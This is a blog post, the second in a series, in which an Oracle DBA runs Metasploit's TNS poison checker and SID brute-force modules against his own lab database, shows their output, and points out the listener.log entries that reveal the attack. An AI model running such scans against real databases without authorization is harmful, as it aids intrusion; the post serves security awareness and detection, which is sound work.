Exploiting an Oracle database with Metasploit (Part 2)

Continuing from Exploiting an Oracle database with Metasploit (Part 1). Here’s the next set of Metasploit exploits and scanners I’ve tried and tested.

auxiliary/scanner/oracle/tnspoison_checker

This one just checks if your database is vulnerable to TNS poisoning:

msf auxiliary(tnspoison_checker) > info

Name: Oracle TNS Listener Checker
Module: auxiliary/scanner/oracle/tnspoison_checker
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2012-04-18

Provided by:
ir0njaw (Nikita Kelesis) <nikita.elkey@gmail.com>

Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOSTS   192.168.56.163   yes       The target address range or CIDR identifier
RPORT    1521             yes       The target port
THREADS  1                yes       The number of concurrent threads

Description:
This module checks the server for vulnerabilities like TNS Poison.
Module sends a server a packet with command to register new TNS
Listener and checks for a response indicating an error. If the
registration is errored, the target is not vulnearble. Otherwise,
the target is vulnerable to malicious registrations.

Yup, it’s vulnerable. But Metasploit doesn’t have the tools to exploit it. To be fair, you probably need to setup a listener to do the exploit properly. So you would need Oracle database software on the Kali Linux box to make the exploit work.

auxiliary/admin/oracle/sid_brute

For this one you don’t need a connection to the database. It will only communicate with the listener, asking time and time again “do you have this instance? No? Do you have that instance? No?…” and so on.

msf auxiliary(win32exec) > use auxiliary/admin/oracle/sid_brute
msf auxiliary(sid_brute) > info

Name: Oracle TNS Listener SID Brute Forcer
Module: auxiliary/admin/oracle/sid_brute
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2009-01-07

Provided by:
MC <mc@metasploit.com>

Basic options:
Name     Current Setting                                         Required  Description
----     ---------------                                         --------  -----------
RHOST    192.168.56.163                                          yes       The target address
RPORT    1521                                                    yes       The target port
SIDFILE  /usr/share/metasploit-framework/data/wordlists/sid.txt  no        The file that contains a list of sids.
SLEEP    1                                                       no        Sleep() amount between each request.

Description:
This module simply attempts to discover the protected SID.

References:
https://www.metasploit.com/users/mc
http://www.red-database-security.com/scripts/sid.txt

The check comes with a list of 577 commonly used instance names, like ORCL, PROD, TEST, instance names set by certain software and variations on those themes. I had to add my instance name to make it come up with anything, because I didn’t have any instances with names in the default list.

msf auxiliary(sid_brute) > run

[*] Starting brute force on 192.168.56.163, using sids from /usr/share/metasploit-framework/data/wordlists/sid.txt...
[+] 192.168.56.163:1521 Found SID 'KNUTSEL'
[*] Done with brute force...
[*] Auxiliary module execution completed

If you want to demo this one, I would advice you to make your own sid list, because going through these will take ages. But make it long enough so you have time to visit the listener.log (in $ORACLE_BASE/diag/tnslsnr/<hostname>/listener/trace), because there you’ll see that this attack can actually be detected. Because you’ll see these errors:

Wed Aug 19 21:19:33 2015
19-AUG-2015 21:19:33 * (CONNECT_DATA=(SID=ORADB3)(CID=(PROGRAM=)(HOST=MSF)(USER=
))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.162)(PORT=33181)) * establish * OR
ADB3 * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
19-AUG-2015 21:19:34 * (CONNECT_DATA=(SID=ORALIN)(CID=(PROGRAM=)(HOST=MSF)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.162)(PORT=58410)) * establish * ORALIN * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
19-AUG-2015 21:19:35 * (CONNECT_DATA=(SID=ORCL0)(CID=(PROGRAM=)(HOST=MSF)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.162)(PORT=59442)) * establish * ORCL0 * 12505

I’m still testing some other exploits, but I have a feeling I’m missing some good scanners to fully utilize Metasploit. I’m thinking of writing my own stuff for Metasploit. For example, I’d like to see a scanner that tries to find usable database links.

The story continues, but I have a lot of other stuff to do. I’ll post info about it when I’m done.

Advertisements

About Marcel-Jan Krijgsman

Ever since I started working with Oracle, I had an interest in Oracle database performance tuning. This led, eventually, to a four day training I made and gave for customers of Transfer Solutions. Since 2012 I work for Rabobank Nederland. A few years ago I also became interested in Oracle database security. All technology aside, it is my experience that security usually plays out on a political level. I'm a Oracle certified professional for the 8i, 9i, 10g and 11g databases and Oracle Database 11g Performance Tuning Certified Expert.
This entry was posted in Hacking for better security awareness, Oracle security and tagged , , , . Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s